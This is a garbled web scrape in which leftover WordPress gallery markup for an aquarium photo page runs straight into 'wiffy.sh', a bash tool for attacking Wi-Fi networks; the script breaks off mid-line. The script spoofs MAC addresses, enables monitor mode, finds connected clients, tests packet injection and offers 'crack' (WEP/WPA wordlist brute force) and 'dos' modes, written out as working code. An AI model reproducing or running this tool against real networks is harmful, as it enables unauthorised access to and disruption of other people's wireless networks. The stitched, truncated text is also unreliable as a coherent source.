"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/akwarium\/akwarium0012.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ 